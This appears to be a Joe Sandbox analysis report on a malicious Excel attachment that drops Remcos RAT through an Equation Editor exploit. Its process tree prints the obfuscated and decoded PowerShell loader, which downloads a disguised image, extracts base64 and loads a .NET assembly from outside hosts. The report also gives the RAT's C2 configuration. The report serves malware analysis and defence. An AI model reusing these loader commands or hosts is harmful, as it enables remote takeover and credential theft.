Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
RFQ No. 109078906v.xla.xlsx

Overview

General Information

Sample name:RFQ No. 109078906v.xla.xlsx
Analysis ID:1500264
MD5:7d6c11d30d7322951af23907572b81ea
SHA1:e48456f2059d8eeaf2b9a2788cbe53b160dbfc3c
SHA256:7d919f1cc55ce5ee6cdd40968757296e07038d7cb676205d77bacff65baa672a
Tags:xlaxlsx
Infos:

Detection

Remcos
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Antivirus detection for dropped file
Contains functionality to bypass UAC (CMSTPLUA)
Detected Remcos RAT
Found malware configuration
Malicious sample detected (through community Yara rule)
Microsoft Office launches external ms-search protocol handler (WebDAV)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Sigma detected: Powershell download and load assembly
Sigma detected: Remcos
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Delayed program exit found
Document exploit detected (process start blacklist hit)
Excel sheet contains many unusual embedded objects
Injects a PE file into a foreign processes
Machine Learning detection for sample
Maps a DLL or memory area into another process
Microsoft Office drops suspicious files
Office drops RTF file
Office equation editor establishes network connection
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Office viewer loads remote template
Searches for Windows Mail specific files
Shellcode detected
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Equation Editor Network Connection
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Suspicious Microsoft Office Child Process
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file / registry access)
Tries to steal Mail credentials (via file registry)
Uses dynamic DNS services
Very long command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Yara detected WebBrowserPassView password recovery tool
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to download and execute PE files
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to launch a control a shell (cmd.exe)
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Document contains Microsoft Equation 3.0 OLE entries
Document contains embedded VBA macros
Document misses a certain OLE stream usually present in this Microsoft Office document type
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found decision node followed by non-executed suspicious APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Excel Network Connections
Sigma detected: Potentially Suspicious Execution Of Regasm/Regsvcs From Uncommon Location
Sigma detected: Suspicious Office Outbound Connections
Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

Process Tree

  • System is w7x64
  • EXCEL.EXE (PID: 3368 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
    • WINWORD.EXE (PID: 3672 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)
      • EQNEDT32.EXE (PID: 3972 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • wscript.exe (PID: 4056 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\sweetbuttersmoothbananaherefor.vBs" MD5: 979D74799EA6C8B8167869A68DF5204A)
      • powershell.exe (PID: 3084 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?Dg? ? ? ? ?M? ? ? ? ?? ? ? ? ?z? ? ? ? ?DE? ? ? ? ?M? ? ? ? ?? ? ? ? ?0? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Mg? ? ? ? ?3? ? ? ? ?C8? ? ? ? ?aQB0? ? ? ? ?GU? ? ? ? ?bQBz? ? ? ? ?C8? ? ? ? ?dgBi? ? ? ? ?HM? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?y? ? ? ? ?DY? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?y? ? ? ? ?DY? ? ? ? ?LwB2? ? ? ? ?GI? ? ? ? ?cw? ? ? ? ?u? ? ? ? ?Go? ? ? ? ?c? ? ? ? ?Bn? ? ? ? ?Cc? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Hc? ? ? ? ?ZQBi? ? ? ? ?EM? ? ? ? ?b? ? ? ? ?Bp? ? ? ? ?GU? ? ? ? ?bgB0? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?E4? ? ? ? ?ZQB3? ? ? ? ?C0? ? ? ? ?TwBi? ? ? ? ?Go? ? ? ? ?ZQBj? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?BT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?E4? ? ? ? ?ZQB0? ? ? ? ?C4? ? ? ? ?VwBl? ? ? ? ?GI? ? ? ? ?QwBs? ? ? ? ?Gk? ? ? ? ?ZQBu? ? ? ? ?HQ? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBC? ? ? ? ?Hk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?HM? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?J? ? ? ? ?B3? ? ? ? ?GU? ? ? ? ?YgBD? ? ? ? ?Gw? ? ? ? ?aQBl? ? ? ? ?G4? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?EQ? ? ? ? ?bwB3? ? ? ? ?G4? ? ? ? ?b? ? ? ? ?Bv? ? ? ? ?GE? ? ? ? ?Z? ? ? ? ?BE? ? ? ? ?GE? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?KQ? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?WwBT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?LgBF? ? ? ? ?G4? ? ? ? ?YwBv? ? ? ? ?GQ? ? ? ? ?aQBu? ? ? ? ?Gc? ? ? ? ?XQ? ? ? ? ?6? ? ? ? ?Do? ? ? ? ?VQBU? ? ? ? ?EY? ? ? ? ?O? ? ? ? ?? ? ? ? ?u? ? ? ? ?Ec? ? ? ? ?ZQB0? ? ? ? ?FM? ? ? ? ?d? ? ? ? ?By? ? ? ? ?Gk? ? ? ? ?bgBn? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?QgB5? ? ? ? ?HQ? ? ? ? ?ZQBz? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?P? ? ? ? ?? ? ? ? ?8? ? ? ? ?EI? ? ? ? ?QQBT? ? ? ? ?EU? ? ? ? ?Ng? ? ? ? ?0? ? ? ? ?F8? ? ? ? ?UwBU? ? ? ? ?EE? ? ? ? ?UgBU? ? ? ? ?D4? ? ? ? ?Pg? ? ? ? ?n? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bl? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?P? ? ? ? ?? ? ? ? ?8? ? ? ? ?EI? ? ? ? ?QQBT? ? ? ? ?EU? ? ? ? ?Ng? ? ? ? ?0? ? ? ? ?F8? ? ? ? ?RQBO? ? ? ? ?EQ? ? ? ? ?Pg? ? ? ? ?+? ? ? ? ?Cc? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BJ? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?V? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?Ek? ? ? ? ?bgBk? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?BP? ? ? ? ?GY? ? ? ? ?K? ? ? ? ?? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?GU? ? ? ? ?bgBk? ? ? ? ?Ek? ? ? ? ?bgBk? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBU? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?B0? ? ? ? ?C4? ? ? ? ?SQBu? ? ? ? ?GQ? ? ? ? ?ZQB4? ? ? ? ?E8? ? ? ? ?Zg? ? ? ? ?o? ? ? ? ?CQ? ? ? ? ?ZQBu? ? ? ? ?GQ? ? ? ? ?RgBs? ? ? ? ?GE? ? ? ? ?Zw? ? ? ? ?p? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bz? ? ? ? ?HQ? ? ? ? ?YQBy? ? ? ? ?HQ? ? ? ? ?SQBu? ? ? ? ?GQ? ? ? ? ?ZQB4? ? ? ? ?C? ? ? ? ?? ? ? ? ?LQBn? ? ? ? ?GU? ? ? ? ?I? ? ? ? ?? ? ? ? ?w? ? ? ? ?C? ? ? ? ?? ? ? ? ?LQBh? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?? ? ? ? ?g? ? ? ? ?CQ? ? ? ? ?ZQBu? ? ? ? ?GQ? ? ? ? ?SQBu? ? ? ? ?GQ? ? ? ? ?ZQB4? ? ? ? ?C? ? ? ? ?? ? ? ? ?LQBn? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BJ? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BJ? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?I? ? ? ? ?? ? ? ? ?r? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C4? ? ? ? ?T? ? ? ? ?Bl? ? ? ? ?G4? ? ? ? ?ZwB0? ? ? ? ?Gg? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?GI? ? ? ? ?YQBz? ? ? ? ?GU? ? ? ? ?Ng? ? ? ? ?0? ? ? ? ?Ew? ? ? ? ?ZQBu? ? ? ? ?Gc? ? ? ? ?d? ? ? ? ?Bo? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?CQ? ? ? ? ?ZQBu? ? ? ? ?GQ? ? ? ? ?SQBu? ? ? ? ?GQ? ? ? ? ?ZQB4? ? ? ? ?C? ? ? ? ?? ? ? ? ?LQ? ? ? ? ?g? ? ? ? ?CQ? ? ? ? ?cwB0? ? ? ? ?GE? ? ? ? ?cgB0? ? ? ? ?Ek? ? ? ? ?bgBk? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?YgBh? ? ? ? ?HM? ? ? ? ?ZQ? ? ? ? ?2? ? ? ? ?DQ? ? ? ? ?QwBv? ? ? ? ?G0? ? ? ? ?bQBh? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBU? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?B0? ? ? ? ?C4? ? ? ? ?UwB1? ? ? ? ?GI? ? ? ? ?cwB0? ? ? ? ?HI? ? ? ? ?aQBu? ? ? ? ?Gc? ? ? ? ?K? ? ? ? ?? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BJ? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?L? ? ? ? ?? ? ? ? ?g? ? ? ? ?CQ? ? ? ? ?YgBh? ? ? ? ?HM? ? ? ? ?ZQ? ? ? ? ?2? ? ? ? ?DQ? ? ? ? ?T? ? ? ? ?Bl? ? ? ? ?G4? ? ? ? ?ZwB0? ? ? ? ?Gg? ? ? ? ?KQ? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?YwBv? ? ? ? ?G0? ? ? ? ?bQBh? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?BC? ? ? ? ?Hk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?HM? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?WwBT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?EM? ? ? ? ?bwBu? ? ? ? ?HY? ? ? ? ?ZQBy? ? ? ? ?HQ? ? ? ? ?XQ? ? ? ? ?6? ? ? ? ?Do? ? ? ? ?RgBy? ? ? ? ?G8? ? ? ? ?bQBC? ? ? ? ?GE? ? ? ? ?cwBl? ? ? ? ?DY? ? ? ? ?N? ? ? ? ?BT? ? ? ? ?HQ? ? ? ? ?cgBp? ? ? ? ?G4? ? ? ? ?Zw? ? ? ? ?o? ? ? ? ?CQ? ? ? ? ?YgBh? ? ? ? ?HM? ? ? ? ?ZQ? ? ? ? ?2? ? ? ? ?DQ? ? ? ? ?QwBv? ? ? ? ?G0? ? ? ? ?bQBh? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?? ? ? ? ?p? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bs? ? ? ? ?G8? ? ? ? ?YQBk? ? ? ? ?GU? ? ? ? ?Z? ? ? ? ?BB? ? ? ? ?HM? ? ? ? ?cwBl? ? ? ? ?G0? ? ? ? ?YgBs? ? ? ? ?Hk? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?WwBT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?FI? ? ? ? ?ZQBm? ? ? ? ?Gw? ? ? ? ?ZQBj? ? ? ? ?HQ? ? ? ? ?aQBv? ? ? ? ?G4? ? ? ? ?LgBB? ? ? ? ?HM? ? ? ? ?cwBl? ? ? ? ?G0? ? ? ? ?YgBs? ? ? ? ?Hk? ? ? ? ?XQ? ? ? ? ?6? ? ? ? ?Do? ? ? ? ?T? ? ? ? ?Bv? ? ? ? ?GE? ? ? ? ?Z? ? ? ? ?? ? ? ? ?o? ? ? ? ?CQ? ? ? ? ?YwBv? ? ? ? ?G0? ? ? ? ?bQBh? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?BC? ? ? ? ?Hk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?HM? ? ? ? ?KQ? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?d? ? ? ? ?B5? ? ? ? ?H? ? ? ? ?? ? ? ? ?ZQ? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?k? ? ? ? ?Gw? ? ? ? ?bwBh? ? ? ? ?GQ? ? ? ? ?ZQBk? ? ? ? ?EE? ? ? ? ?cwBz? ? ? ? ?GU? ? ? ? ?bQBi? ? ? ? ?Gw? ? ? ? ?eQ? ? ? ? ?u? ? ? ? ?Ec? ? ? ? ?ZQB0? ? ? ? ?FQ? ? ? ? ?eQBw? ? ? ? ?GU? ? ? ? ?K? ? ? ? ?? ? ? ? ?n? ? ? ? ?GQ? ? ? ? ?bgBs? ? ? ? ?Gk? ? ? ? ?Yg? ? ? ? ?u? ? ? ? ?Ek? ? ? ? ?Tw? ? ? ? ?u? ? ? ? ?Eg? ? ? ? ?bwBt? ? ? ? ?GU? ? ? ? ?Jw? ? ? ? ?p? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bt? ? ? ? ?GU? ? ? ? ?d? ? ? ? ?Bo? ? ? ? ?G8? ? ? ? ?Z? ? ? ? ?? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?k? ? ? ? ?HQ? ? ? ? ?eQBw? ? ? ? ?GU? ? ? ? ?LgBH? ? ? ? ?GU? ? ? ? ?d? ? ? ? ?BN? ? ? ? ?GU? ? ? ? ?d? ? ? ? ?Bo? ? ? ? ?G8? ? ? ? ?Z? ? ? ? ?? ? ? ? ?o? ? ? ? ?Cc? ? ? ? ?VgBB? ? ? ? ?Ek? ? ? ? ?Jw? ? ? ? ?p? ? ? ? ?C4? ? ? ? ?SQBu? ? ? ? ?HY? ? ? ? ?bwBr? ? ? ? ?GU? ? ? ? ?K? ? ? ? ?? ? ? ? ?k? ? ? ? ?G4? ? ? ? ?dQBs? ? ? ? ?Gw? ? ? ? ?L? ? ? ? ?? ? ? ? ?g? ? ? ? ?Fs? ? ? ? ?bwBi? ? ? ? ?Go? ? ? ? ?ZQBj? ? ? ? ?HQ? ? ? ? ?WwBd? ? ? ? ?F0? ? ? ? ?I? ? ? ? ?? ? ? ? ?o? ? ? ? ?Cc? ? ? ? ?d? ? ? ? ?B4? ? ? ? ?HQ? ? ? ? ?LgBS? ? ? ? ?FI? ? ? ? ?VgBF? ? ? ? ?C8? ? ? ? ?YwBi? ? ? ? ?G4? ? ? ? ?LwBw? ? ? ? ?H? ? ? ? ?? ? ? ? ?bQBh? ? ? ? ?Hg? ? ? ? ?Lw? ? ? ? ?x? ? ? ? ?DI? ? ? ? ?Lg? ? ? ? ?x? ? ? ? ?DM? ? ? ? ?Lg? ? ? ? ?y? ? ? ? ?Dc? ? ? ? ?MQ? ? ? ? ?u? ? ? ? ?Dc? ? ? ? ?M? ? ? ? ?? ? ? ? ?x? ? ? ? ?C8? ? ? ? ?Lw? ? ? ? ?6? ? ? ? ?H? ? ? ? ?? ? ? ? ?d? ? ? ? ?B0? ? ? ? ?Gg? ? ? ? ?Jw? ? ? ? ?g? ? ? ? ?Cw? ? ? ? ?I? ? ? ? ?? ? ? ? ?n? ? ? ? ?GQ? ? ? ? ?ZQBz? ? ? ? ?GE? ? ? ? ?d? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?YQBk? ? ? ? ?G8? ? ? ? ?Jw? ? ? ? ?g? ? ? ? ?Cw? ? ? ? ?I? ? ? ? ?? ? ? ? ?n? ? ? ? ?GQ? ? ? ? ?ZQBz? ? ? ? ?GE? ? ? ? ?d? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?YQBk? ? ? ? ?G8? ? ? ? ?Jw? ? ? ? ?g? ? ? ? ?Cw? ? ? ? ?I? ? ? ? ?? ? ? ? ?n? ? ? ? ?GQ? ? ? ? ?ZQBz? ? ? ? ?GE? ? ? ? ?d? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?YQBk? ? ? ? ?G8? ? ? ? ?Jw? ? ? ? ?s? ? ? ? ?Cc? ? ? ? ?UgBl? ? ? ? ?Gc? ? ? ? ?QQBz? ? ? ? ?G0? ? ? ? ?Jw? ? ? ? ?s? ? ? ? ?Cc? ? ? ? ?Jw? ? ? ? ?p? ? ? ? ?Ck? ? ? ? ?';$OWjuxD = [system.Text.encoding]::Unicode.GetString( [system.Convert]::Frombase64String( $Codigo.replace('? ? ? ? ?','A') ) );powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD MD5: EB32C070E658937AA9FA9F3AE629B2B8)
        • powershell.exe (PID: 2772 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.RRVE/cbn/ppmax/12.13.271.701//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))" MD5: EB32C070E658937AA9FA9F3AE629B2B8)
          • RegAsm.exe (PID: 2780 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 8FE9545E9F72E460723F484C304314AD)
            • RegAsm.exe (PID: 1764 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\dkvezxrxwrjunntcnioxumzdjxq" MD5: 8FE9545E9F72E460723F484C304314AD)
            • RegAsm.exe (PID: 724 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\neiwzpcqkzbyxbpgesbzxztmrehzcv" MD5: 8FE9545E9F72E460723F484C304314AD)
            • RegAsm.exe (PID: 2544 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\neiwzpcqkzbyxbpgesbzxztmrehzcv" MD5: 8FE9545E9F72E460723F484C304314AD)
            • RegAsm.exe (PID: 1600 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\qgopainsfhtlahdsndosiegdstrivgqcq" MD5: 8FE9545E9F72E460723F484C304314AD)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

Malware Configuration

Threatname: Remcos

{"Host:Port:Password": "2024remcmon.duckdns.org:14645:1", "Assigned name": "zynova", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-R2I0JW", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\FFA95D3F.docINDICATOR_RTF_MalVer_ObjectsDetects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.ditekSHen
  • 0x1e88:$obj2: \objdata
  • 0x1e72:$obj3: \objupdate
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\sweettastedbananabuttersmoothchcolcatebutterrichcontenttokeepsmoothbutterchocolatebuntogetmesweetgirl________yummybutterchocolatesmoothheret[1].docINDICATOR_RTF_MalVer_ObjectsDetects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.ditekSHen
  • 0x1e88:$obj2: \objdata
  • 0x1e72:$obj3: \objupdate

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000E.00000002.620697128.0000000000525000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
    0000000E.00000002.620697128.0000000000541000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
      0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
